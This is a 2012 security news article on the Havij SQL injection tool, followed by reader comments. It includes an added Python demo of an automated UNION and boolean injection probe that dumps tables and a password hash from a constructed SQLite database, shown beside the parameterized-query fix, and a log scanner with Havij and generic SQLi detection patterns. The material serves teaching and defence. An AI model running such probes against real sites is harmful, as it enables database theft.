
07:26 PM

Cybercrime's Love Affair With Havij Spells SQL Injection Trouble

Automated SQL injection attack tool makes database extraction as easy as a button click for cybercriminals

Today's exponential increase in attack volume and complexity can largely be chalked up to the cybercriminal's creed of working smarter, not harder. It isn't so much l33t hackers toiling at code for hours that enterprises have to worry about. Instead, it's the nontechnical crooks who can carry out their attacks with a few clicks of a button using automated tools that do the technical dirty work for them. In the database-cracking world, Havij stands as one of the most popular of these tools. As such, it should be on the radar of any security professional seeking to prevent costly data breaches within their environments.

"If you're talking about databases and the tools that are used to perform SQL injection, Havij is one of the most common," says Noa Bar Yosef, senior security strategist at Imperva.

Developed by Iranian hackers sometime in spring 2010, Havij is named for the Farsi word for "carrot," which also doubles as colorful slang for the male sexual organ. Corny penetration jokes notwithstanding, the tool has so completely captured the hearts and minds of the black hat community that groups like Anonymous frequently train their legions on how to wreak havoc using it, says Josh Shaul, CTO of Application Security Inc.

"So when I sat and read chat logs from Anonymous IRC rooms where they do hacker training, the only thing I ever see mentioned is Havij," Shaul says. "The reason for that is Havij is awesome. And it's as powerful and easy to use as could be."

Favored by hacktivists and financially motivated attackers alike, Havij automates the SQL injection attack end to end: it detects the database behind a targeted website, works out whether the injectable parameter is a string or an integer, and tries different injection syntaxes against the target. Unlike many penetration-testing tools, which stop at pointing to a potential vulnerability, Havij also carries out the data extraction and harvesting.

"By using this software, a user can perform back-end database fingerprinting, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements, and even access the underlying file system and execute commands on the operating system," said a recent Imperva executive report (PDF). All of it is carried out through a simple GUI in which an attacker can mount an attack with a few clicks.

"Basically, you fire up the product: There's a box at the top of the screen where it wants you to type some kind of Web page, so you type it in and then there's a button that says 'Analyze.' It's like the 'Go' button, and you click 'Go.' Literally, that's it," Shaul says. "So it comes back and says, 'Hey, I found a SQL injection potential on this site.'"

At that point, the tool reports what kind of web server and DBMS is running on the back end, and whether the account the application uses to talk to the database holds administrative privileges.

"So then there are a few other things that you can do. There's a button that's just called 'Info,' and if you click that button, it'll go out and get a bunch of detailed info about the database," Shaul says. "There's a button called 'Table.' If you click that button, it'll go into that database and come back with a list of tables in that database that you can navigate, sort of like navigating through a Windows file explorer where you can click on the table name, and it'll expand out."

The tool's power and ease of use should be enough to get the attention of enterprises seeking to prevent breaches such as the one last spring at PBS, in which an attacker using Havij gained the ability to post phony story headlines on the PBS site.

"What it means for enterprises is that everybody out there that wants it has sort of industrial-grade SQL injection test kits at their fingertips," Shaul says. "And if organizations aren't really rigorously testing their applications for SQL injection vulnerabilities, they're going to be missing something that an attacker is not going to miss."

Preventing SQL injection starts at the application level. The reliable fix is to keep user input out of the query text altogether: use parameterized queries (prepared statements) with bound variables, so that whatever the user supplies is handled as data and never parsed as SQL. Input validation and sanitization help as a second layer, but on their own they are easy to get wrong, and a single missed parameter is all an automated tool needs. Obviously, though, there's a whole host of applications already in production that still need protecting.
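The script below is an added illustration, not code from the article or from Havij itself. Against a constructed in-memory SQLite database it models the steps the article describes: a hypothetical `/product?id=` handler that pastes its parameter into the query; an automated probe that, in the manner the article attributes to Havij, decides whether the parameter sits in an integer or a quoted-string context, finds the column count with UNION, and then dumps table names and user password hashes; and the same handler rewritten with a validated, bound parameter, against which the probe never gets a foothold. The schema, the sample rows, the hash value and all function names are assumptions made up for the example.

```python
"""Vanilla SQL injection: the bug, an automated probe in the Havij mould, and the fix.
Everything here is constructed for illustration; none of it is Havij's code."""
import sqlite3


def make_db():
    """Constructed stand-in for the site's back-end database (assumed schema and data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def vulnerable_lookup(db, product_id):
    """Hypothetical '/product?id=' handler: the parameter is pasted into the SQL (the bug)."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error:
        return None  # the site shows a generic error page; the probe only learns "it broke"


def safe_lookup(db, product_id):
    """Same handler, fixed: validate the type, then bind the value so it is data, never SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        return []
    return [row[0] for row in db.execute("SELECT name FROM products WHERE id = ?", (pid,))]


# --- the automated attacker, modelled on the steps the article lists ---

def detect_context(page, base):
    """Step 1: is the parameter in an integer or a quoted-string context?
    A true/false pair that keeps/changes the page answers that without any error text."""
    baseline = page(base)
    if page(base + " AND 1=1") == baseline and page(base + " AND 1=2") != baseline:
        return "integer"
    if page(base + "' AND '1'='1") == baseline and page(base + "' AND '1'='2") != baseline:
        return "string"
    return None


def inject(base, ctx, payload):
    """Wrap a payload for the detected context; the trailing comment discards the query's tail."""
    quote = "" if ctx == "integer" else "'"
    return f"{base}{quote} AND 1=2 {payload} -- "


def find_columns(page, base, ctx, max_cols=8):
    """Step 2: UNION only works when the column count matches; no error means a match."""
    for n in range(1, max_cols + 1):
        if page(inject(base, ctx, "UNION SELECT " + ",".join(["NULL"] * n))) is not None:
            return n
    return None


def dump(page, base, ctx, ncols, expr, source):
    """Step 3: put the data we want into the first column of the UNIONed SELECT."""
    cols = ",".join([expr] + ["NULL"] * (ncols - 1))
    rows = page(inject(base, ctx, f"UNION SELECT {cols} FROM {source}"))
    return sorted(rows) if rows else []


def run_probe(page, base="1"):
    """One 'Analyze' click: fingerprint the injection point, then harvest."""
    result = {"context": detect_context(page, base)}
    if result["context"] is None:
        return result  # nothing injectable: the probe gets no further
    ctx = result["context"]
    n = find_columns(page, base, ctx)
    result["columns"] = n
    result["tables"] = dump(page, base, ctx, n, "name", "sqlite_master WHERE type='table'")
    result["users"] = dump(page, base, ctx, n, "login || ':' || pw_hash", "users")
    return result


def demo():
    """Run the probe against the vulnerable handler and then against the fixed one."""
    db = make_db()
    vuln = run_probe(lambda p: vulnerable_lookup(db, p))
    safe = run_probe(lambda p: safe_lookup(db, p))
    return vuln, safe


if __name__ == "__main__":
    print(demo())
```

Against `vulnerable_lookup` the probe reports an integer context, a single column, the two table names and the admin hash; against `safe_lookup` it reports no context at all, because the bound parameter is never interpreted as SQL and the integer check rejects the payloads before they reach the database. The probe is deliberately minimal (boolean and UNION techniques only, SQLite syntax only); the real tool adds error- and time-based techniques and per-DBMS syntax, which is exactly why relying on the attacker missing something is a losing bet.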

That's where database security tools with SQL injection blocking come into play.

"SQL injection is all about dirty input. In the end, the solution is input sanitization. That's an easy thing to say -- it's not an easy thing to do. You've got to put up some applications ... that are running that you'd like to fix, but it's going to take time. So the stop-gap measure that I think folks need to implement is database security," Shaul says. "Bringing that security right to where the data lives is the best way to effectively protect it while you're going through the process of fixing these known vulnerabilities in the environment."

According to Rob Rachwald, director of security for Imperva, Havij in particular has characteristics that make it possible for blocking tools to detect its activity in real time. Such fingerprints are worth matching, but they identify the stock tool rather than the attack: an attacker who edits the user-agent string or the payload template sidesteps them, so tool signatures complement generic injection detection and the application-level fix rather than replace either.

"When it hits the website, it gives a certain fingerprint that says, 'Hey, I'm an attack tool,'" Rachwald says. "So you can block that traffic right there."
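One way to turn that observation into a check, as an added example rather than anything from the article or from Imperva's product, is a small Python scanner over web-server access logs in the common "combined" format. The log lines are constructed for the example, and the signature table is an assumption: the two Havij-specific entries (a hex constant in the query string and the tool name in the User-Agent header) are taken from public WAF rule sets for the tool, not from this article, and should be confirmed against a capture of the version you actually face. The generic rules are there to catch the same injection when the tool has been reconfigured or replaced.

```python
"""Spot Havij-style SQL injection traffic in access logs. Constructed example, not product code."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# (rule name, pattern, which field to inspect). The havij_* entries are assumptions drawn
# from public WAF rule sets; verify them against your own captures before relying on them.
SIGNATURES = [
    ("havij_marker", re.compile(r"0x31303235343830303536", re.I), "query"),
    ("havij_ua", re.compile(r"\bhavij\b", re.I), "ua"),
    ("generic_union", re.compile(r"\bunion\b.{0,20}?\bselect\b", re.I | re.S), "query"),
    ("generic_boolean",
     re.compile(r"\b(?:and|or)\b\s+(?:\d+|'[^']*')\s*=\s*(?:\d+|'[^']*')", re.I), "query"),
]

# Constructed sample: one normal visitor, a Havij-like session, a search that must not
# trigger, and a hand-rolled UNION probe from a different source.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Mar/2012:19:26:01 +0000] "GET /product.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/11.0"',
    '198.51.100.9 - - [28/Mar/2012:19:26:02 +0000] "GET /product.php?id=12%20and%201=2%20union%20select%200x31303235343830303536,null,null%20--%20 HTTP/1.1" 200 6001 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Havij"',
    '198.51.100.9 - - [28/Mar/2012:19:26:03 +0000] "GET /product.php?id=12%20and%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Havij"',
    '192.0.2.44 - - [28/Mar/2012:19:27:10 +0000] "GET /search.php?q=cats%20and%20dogs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.45 - - [28/Mar/2012:19:28:00 +0000] "GET /product.php?id=12%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20 HTTP/1.1" 500 301 "-" "curl/7.22.0"',
]


def parse(line):
    """Split one combined-format line into the fields the signatures look at; the query
    string is URL-decoded so encoded spaces and quotes cannot hide a payload."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    return {"ip": m.group("ip"), "query": query, "ua": m.group("ua"), "status": m.group("status")}


def scan(lines):
    """Return one hit per (line, rule) for every signature that fires, in table order."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None:
            continue
        for name, rx, field in SIGNATURES:
            if rx.search(rec[field]):
                hits.append({"line": n, "ip": rec["ip"], "rule": name})
    return hits


def summarize(hits):
    """Per source address: the rules it tripped and whether a known-tool signature was among them."""
    rules = defaultdict(set)
    for h in hits:
        rules[h["ip"]].add(h["rule"])
    return {ip: {"rules": sorted(r), "tool": any(x.startswith("havij_") for x in r)}
            for ip, r in rules.items()}


if __name__ == "__main__":
    for ip, info in summarize(scan(SAMPLE_LOG)).items():
        print(ip, info)
```

On the sample, the second source trips both tool-specific rules and both generic ones, the `curl` source trips only the generic UNION rule, and the search for "cats and dogs" trips nothing because the boolean rule insists on a number or quoted literal on each side of the `=`. In production the same matching belongs in the WAF or database-firewall rule set rather than a batch script, and a source that trips only generic rules still deserves a look: that is what the tool looks like once its fingerprints have been edited out.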


Comments

4/2/2012 | 5:38:58 PM
re: Cybercrime's Love Affair With Havij Spells SQL Injection Trouble
Some good tips here about preventing SQL injection bugs in your code --
Brian Prince, InformationWeek/Dark Reading Comment Moderator
4/1/2012 | 12:09:28 AM
re: Cybercrime's Love Affair With Havij Spells SQL Injection Trouble
People tend to forget that it's not attacker tools that make vulnerabilities as bad as SQL injection -- it's developers. Developers caused this problem; this is their technical debt.

Havij doesn't find and exploit advanced SQL injection vulnerabilities. Heck, it doesn't even find SQL injection vulnerabilities at all -- it only exploits ones already found. Stranger still, Havij works best with vanilla SQL injection vulnerabilities.

A vanilla SQL injection vulnerability is akin to binding a bash shell to port 1337 using inetd. It's a glaring, visible, huge backdoor waiting for anyone to target it.

To put this in a context that maybe you'll understand in the physical world: it's like putting a huge stockpile of gold bars in your foyer and leaving your front door wide open with a huge sign on your lawn reading "FREE GOLD INSIDE".

Havij is merely a figurative wheel barrow designed to lift the gold out of your foyer. It's not complex or insightful.